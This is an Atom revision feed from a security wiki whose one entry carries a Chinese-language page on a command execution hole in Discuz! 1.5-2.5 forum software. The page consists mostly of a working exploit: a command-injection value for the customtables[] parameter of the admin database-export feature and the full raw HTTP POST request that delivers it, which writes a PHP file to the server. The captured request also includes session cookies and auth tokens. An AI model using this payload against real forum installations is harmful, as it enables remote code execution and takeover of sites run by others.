<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Discuz%21_1.5-2.5_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-hant</id>
	<title>Discuz! 1.5-2.5 命令執行漏洞/zh-hant - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Discuz%21_1.5-2.5_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E%2Fzh-hant"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Discuz!_1.5-2.5_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-hant&amp;action=history"/>
	<updated>2026-04-07T04:00:59Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Discuz!_1.5-2.5_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-hant&amp;diff=3585&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;數據包&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Discuz!_1.5-2.5_%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E/zh-hant&amp;diff=3585&amp;oldid=prev"/>
		<updated>2021-05-26T16:13:01Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;數據包&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;&amp;lt;languages  /&amp;gt;&lt;br /&gt;
==漏洞利用==&lt;br /&gt;
&lt;br /&gt;
登錄管理員後臺&lt;br /&gt;
&lt;br /&gt;
[[File:Dz01.png |700px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:Dz02.png | 700px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
修改的參數&lt;br /&gt;
&lt;br /&gt;
參數&amp;lt;code&amp;gt;customtables[]&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
customtables%5B%5D=pre_common_admincp_cmenu&amp;quot;&amp;gt;aaa; echo '&amp;lt;?php phpinfo(); ?&amp;gt;' &amp;gt; phpinfo.php #&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
數據包&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
POST /discuz25/admin.php?action=db&amp;amp;operation=export&amp;amp;setup=1 HTTP/1.1&lt;br /&gt;
Host: localhost&lt;br /&gt;
Content-Length: 252&lt;br /&gt;
Cache-Control: max-age=0&lt;br /&gt;
Origin: http://localhost&lt;br /&gt;
Upgrade-Insecure-Requests: 1&lt;br /&gt;
Content-Type: application/x-www-form-urlencoded&lt;br /&gt;
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36&lt;br /&gt;
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8&lt;br /&gt;
Referer: http://localhost/discuz25/admin.php?action=db&amp;amp;operation=export&lt;br /&gt;
Accept-Encoding: gzip, deflate&lt;br /&gt;
Accept-Language: zh-CN,zh;q=0.9&lt;br /&gt;
Cookie: _ga=GA1.1.994534325.1530166127; PHPSESSID=ffe1069f199ac7656303b61e42db4f5d; ECSCP_ID=e685eee56d5dc4a732b0b1ecb8cbac6becac2355; ECS_ID=b9e7920dfb02c84b5298d0022c64a8fc393376d7; Phpstorm-326452dc=558db1bc-7f7b-4670-8d36-9cef7d8c1b9d; ECS[visit_times]=8; 3Od_visitedfid=2; 3Od_auth=03d3WSoYgxBuC4Yg3mqq4yEVgLBDsrbNx%2F8rIcURpRI5sDFtpC1S9F%2BYa6BViyFggZYM7bac7evIAZJdgLOJ7Q; 3Od_sid=mm4AMQ; QoOR_2132_saltkey=V6AnRzmw; QoOR_2132_lastvisit=1545183584; QoOR_2132_widthauto=-1; R94S_2132_saltkey=1hs56u42; R94S_2132_lastvisit=1545220172; R94S_2132_promotion=1; R94S_2132_auth=75696lGYV1FEogy00DO%2FmyhWbxk8OljAPZAeSvxfgwvvLbMruyS2sfVSYZUG4wr3GYw5L66%2FfppgB9gzioss; R94S_2132_creditnotice=0D0D2D0D0D0D0D0D0D1; R94S_2132_creditbase=0D0D1D0D0D0D0D0D0; R94S_2132_creditrule=%E6%AF%8F%E5%A4%A9%E7%99%BB%E5%BD%95; R94S_2132_ulastactivity=e0adnKO8pY2qUt5XPBdVc3jbgQxCrCiAkAFzNuN%2Fu9wTbgHc7XLK; R94S_2132_sid=9H4E8j; R94S_2132_lastact=1545224711%09admin.php%09; QoOR_2132_sid=BdGwL9; QoOR_2132_sendmail=1; QoOR_2132_ulastactivity=9cf4%2B3XCcfF1uHee0LOFG0wa6FFvCc1Rp96Kg%2BkgOi%2FL7ovDRKru; QoOR_2132_auth=32d7SwpKowF2VAeqfqe0dWo1FjINHjZA9zt%2ByF8A7LOif0pFSaHnEznijiCaqgsQD8NSBtEiwEDL4Wrnx1gz; QoOR_2132_checkpatch=1; QoOR_2132_checkupgrade=1; QoOR_2132_lastact=1545224853%09admin.php%09&lt;br /&gt;
Connection: close&lt;br /&gt;
&lt;br /&gt;
formhash=0d2eaac0&amp;amp;scrolltop=&amp;amp;anchor=&amp;amp;type=custom&amp;amp;customtables%5B%5D=pre_common_admincp_cmenu&amp;quot;&amp;gt;aaa; echo '&amp;lt;?php phpinfo(); ?&amp;gt;' &amp;gt; phpinfo.php #&amp;amp;method=shell&amp;amp;extendins=0&amp;amp;sqlcompat=&amp;amp;usehex=1&amp;amp;usezip=0&amp;amp;filename=181219_u0CC19kJ&amp;amp;exportsubmit=%E6%8F%90%E4%BA%A4&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>